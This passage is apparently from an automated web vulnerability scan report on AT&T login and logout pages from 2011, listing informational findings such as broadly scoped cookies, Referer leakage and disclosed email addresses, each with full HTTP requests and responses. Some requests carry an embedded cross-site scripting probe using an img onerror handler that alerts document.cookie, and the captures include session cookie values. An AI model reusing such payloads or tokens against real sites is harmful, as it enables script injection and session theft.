<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...

5.2. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/jsp/tiles/common_includes/cGateCookie.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /olam/jsp/tiles/common_includes/cGateCookie.jsp?userType=&isLogout= HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946630070

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 530
Content-Type: text/html; charset=UTF-8
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:23:42 GMT
Connection: keep-alive
Set-Cookie: TLTHID=638F77867125107191D59E552188C3F4; path=/; domain=.att.com


<html>
   <body>
       <form name="myForm">
        <input type="hidden" name="userid" size="20" />
        <input type="hidden" name="passwor
...[SNIP]...

5.3. https://www.att.com/olam/loginAction.olamexecute  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/loginAction.olamexecute

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /olam/loginAction.olamexecute?customerType=L HTTP/1.1
Host: www.att.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; browserid=A001533839947; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; TLTHID=EF42DE367124107128A6B78052916767; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie", no-store
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: -1
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:23:12 GMT
Connection: keep-alive
Set-Cookie: TLTHID=51FED87C712510718C76EED8C4C046B3; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=bcTFN4lQG1bh6jxwQH9J6WbgCPbbSR0clw6DkTqhl10gs7wvmsw1!725500378; path=/
Set-Cookie: stack=doammw31; path=/
Set-Cookie: colam_ctn=l%3Den_US; domain=.att.com; expires=Thursday, 26-Apr-2012 23:23:12 GMT; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:23:12 GMT; path=/
Content-Length: 57400


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...

5.4. https://www.att.com/olam/logout.olamexecute  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/logout.olamexecute

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /olam/logout.olamexecute HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; EDOCSSESSIONID=tYgVN4nK1nfNdRJZhy0ypsrD9ygDfXD1ySTF2yVvkQR5PmZBwTtL!-744530585; colam_ctn=l%3Den_US; TLTHID=83E4A0D271261071AF049E552188C3F4; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-account-mgmt%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22N%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22https%3A%2F%2Fwww.att.com%2Folam%2FloginAction.olamexecuted4776%5C%22%3E%3Cimg%20src%3Da%20onerror%3Dalert(document.cookie)%3E308930536fd%22%2C%22pv%22%3A5%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d2%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d5%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%2C%22e%22%3A2%7D%7D%2C%22cd%22%3A5%2C%22sd%22%3A5%7D

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie", no-store
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: -1
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:39:47 GMT
Connection: keep-alive
Set-Cookie: TLTHID=A313761C71271071C2539E552188C3F4; path=/; domain=.att.com
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: stack=doammw08; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: stack=doammw08; path=/
Set-Cookie: EDOCSSESSIONID=h0BxN4pDq3BVSNCXR6bvvmwLZFpCpyHGBPHnzkcykGGYhNS2ycG9!-744530585; path=/
Set-Cookie: stack=doammw08; path=/
Set-Cookie: colam_ctn=l%3Den_US; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: stack=doammw08; path=/
Content-Length: 57599


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...

5.5. https://www.att.com/olam/registrationAction.olamexecute  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/registrationAction.olamexecute

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /olam/registrationAction.olamexecute HTTP/1.1
Host: www.att.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; browserid=A001533839947; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; TLTHID=EF42DE367124107128A6B78052916767; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie", no-store
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: -1
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:23:17 GMT
Connection: keep-alive
Set-Cookie: TLTHID=54B4862A712510717B51952E259E14A2; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=1Xg6N4lFf66p8RzjmLVH6cygD59mH6qmpXs0hM6Jx6LyFSZH2Llj!2022867730; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:23:17 GMT; path=/
Set-Cookie: stack=p1eam1m6; path=/
Content-Length: 31527


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...

6. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/loginAction.olamexecute

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /olam/loginAction.olamexecute?customerType=L HTTP/1.1
Host: www.att.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; browserid=A001533839947; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; TLTHID=EF42DE367124107128A6B78052916767; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie", no-store
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: -1
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:23:12 GMT
Connection: keep-alive
Set-Cookie: TLTHID=51FED87C712510718C76EED8C4C046B3; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=bcTFN4lQG1bh6jxwQH9J6WbgCPbbSR0clw6DkTqhl10gs7wvmsw1!725500378; path=/
Set-Cookie: stack=doammw31; path=/
Set-Cookie: colam_ctn=l%3Den_US; domain=.att.com; expires=Thursday, 26-Apr-2012 23:23:12 GMT; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:23:12 GMT; path=/
Content-Length: 57400


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...
<noscript>
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="400" height="230">
       <param name="movie" value="/olam/English/images/attLoader_001.swf"/>
...[SNIP]...
<noscript><iframe src="https://view.atdmt.com/iaction/cntcin_OLAMLoginPageUAT_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

7. Email addresses disclosed  previous  next
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. https://www.att.com/olam/loginAction.olamexecute  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/loginAction.olamexecute

Issue detail

The following email addresses were disclosed in the response:

Request

GET /olam/loginAction.olamexecute?customerType=L HTTP/1.1
Host: www.att.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; browserid=A001533839947; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; TLTHID=EF42DE367124107128A6B78052916767; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie", no-store
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: -1
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:23:12 GMT
Connection: keep-alive
Set-Cookie: TLTHID=51FED87C712510718C76EED8C4C046B3; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=bcTFN4lQG1bh6jxwQH9J6WbgCPbbSR0clw6DkTqhl10gs7wvmsw1!725500378; path=/
Set-Cookie: stack=doammw31; path=/
Set-Cookie: colam_ctn=l%3Den_US; domain=.att.com; expires=Thursday, 26-Apr-2012 23:23:12 GMT; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:23:12 GMT; path=/
Content-Length: 57400


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...
Div").className = "";
   }

   //Below Code added to fix defect WUP00364204
   
   // ISSUE
   //If user login using wireline id qaywls_3212680090 and rememberme checkbox is checked
   //then while logout qaywls_3212680090@attworld.com is populated in user text box
   //In cookie qaywls_3212680090@attworld.com is treaded as uverse id (email)
   
   // code modified for the defect WUP00371849
   // Code modified for WUP00364204 defect
   var tGuardOn = document.loginActionForm.tGuardOn;
   var accountType = docum
...[SNIP]...
<div id="exampleUverse">(Example: john@att.net)</div>
...[SNIP]...

7.2. https://www.att.com/olam/logout.olamexecute  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/logout.olamexecute

Issue detail

The following email addresses were disclosed in the response:

Request

GET /olam/logout.olamexecute HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; EDOCSSESSIONID=tYgVN4nK1nfNdRJZhy0ypsrD9ygDfXD1ySTF2yVvkQR5PmZBwTtL!-744530585; colam_ctn=l%3Den_US; TLTHID=83E4A0D271261071AF049E552188C3F4; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-account-mgmt%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22N%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22https%3A%2F%2Fwww.att.com%2Folam%2FloginAction.olamexecuted4776%5C%22%3E%3Cimg%20src%3Da%20onerror%3Dalert(document.cookie)%3E308930536fd%22%2C%22pv%22%3A5%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d2%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d5%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%2C%22e%22%3A2%7D%7D%2C%22cd%22%3A5%2C%22sd%22%3A5%7D

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie", no-store
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: -1
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
